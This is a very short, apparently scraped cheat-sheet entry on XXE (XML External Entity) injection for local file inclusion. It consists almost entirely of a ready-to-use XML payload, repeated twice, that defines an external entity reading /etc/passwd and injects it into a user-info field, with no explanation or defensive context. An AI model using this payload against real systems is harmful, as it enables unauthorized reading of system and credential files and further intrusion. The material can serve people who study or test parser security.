XXE (XML External Entity)
XML to LFI
<!DOCTYPE replace [<!ENTITY name SYSTEM 'file:///etc/passwd'> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>Last updated
<!DOCTYPE replace [<!ENTITY name SYSTEM 'file:///etc/passwd'> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>Last updated